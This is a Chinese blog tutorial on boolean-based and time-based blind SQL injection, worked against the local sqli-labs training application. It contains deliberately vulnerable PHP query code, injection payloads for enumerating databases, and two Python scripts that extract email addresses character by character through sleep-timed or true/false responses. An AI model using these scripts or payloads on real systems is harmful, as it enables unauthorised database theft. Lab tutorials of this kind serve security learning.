booling / time - based - blind
in PENETRATIONCTF with 0 comment

booling / time - based - blind

in PENETRATIONCTF with 0 comment

[盲注]

 【booling-based-blind】:基于布尔的盲注
    

【盲注中的常使用的截断字符串函数】

1, substring()

Image.png

2, mid()
Image.png

Image.png
3, left
Left()得到字符串左部指定个数的字符
Image.png

【盲注代码】

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font size="5" color="#FFFF00">';    
      echo 'You are in...........';
      echo "<br>";
      echo $sql."<br>";
        echo "</font>";
      }
    else
    {
    
    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    
    
    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

【利用脚本】

Image.png

//获取id为2的邮箱地址,注意。此时SQL查询的表为users表
#/usr/bin/evn python
# _*_ coding:utf-8 _*_
import requests
import sys
url = "http://127.0.0.1/sqli/Less-8/?id=5"
data = "1234567890abcdefghijklmnopqrstuvwxyz@ABCDEFGHIJKLMNOPQRSTUVWXYZ"

payload ="' and ascii(substring((select email_id from emails where id =2),{0},1)) = {1} %23"

email =""
for i in range(1,32):
    for j in data:
        j= ord(j)
        exp = url+payload.format(i,j)
        res = requests.get(exp)
        if "You are in" in res.text:
            email+=chr(j)
            print email

同理,获取数据库的payload可写为:
ascii(substr(database(),{0},1))= {1} %23;
获取所有数据库的payload为:
Ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1)))

【time-based-blind】

基于时间的盲注其实也可以理解为另一种类型的布尔型,只是判断的标准变为了时间。

【案例】

sqli-labs-less8

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)
    {
      echo '<font size="5" color="#FFFF00">';    
      echo 'You are in...........';
      echo "<br>";
        echo "</font>";
      }
    else
    {
    
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    
    
    }

可以看到,无论输入的参数值是什么,都会返回同一个页面,“you are in 。。” 如果不仔细测试,就像没有注入一样,所以这时加入时间来判断,使用payload
http://127.0.0.1/sqli/Less-10/?id=3” and sleep(4) —+
延迟了4s,这里可以使用脚本来跑了。
Image.png

#!/usr/bin/evn python
#_*_ coding:utf-8_*_

import requests
import time

url = "http://127.0.0.1/sqli/Less-10/?id=3"
exp = "\" and if(ord(substr((select email_id from emails where id = 3),{0},1))={1},sleep(3),0) --+"
payloads = "1234567890abcdefghijklmnopqrstuvwxyz@ABCDEFGHIJKLMNOPQRSTUVWXYZ"

user = ""
for i in range(1, 32):
    for payload in payloads:
        payload = ord(payload)
        startTime = time.time()
        urls = url+exp.format(i, payload)
        #print urls
        res = requests.get(urls)
        if time.time()-startTime > 3:
            user += chr(payload)
            print user

【在盲注中常使用的函数】
1,sleep(int)
顾名思义,就是延迟你指定的时间的意思
2,IF(expr1,expr2,expr3)
其中,expr1是判断条件,expr2和expr3是符合expr1的自定义的返回结果
如 if(substr(user,1,1)=‘r’,sleep(5),0)
如果user() 第一个字符为’r’ 则延迟5s,否则返回0
3,find_in_set() 函数
如果字符串str是在的strlist组成的N子串的字符串列表,返回值的范围为1到N

Image.png

Responses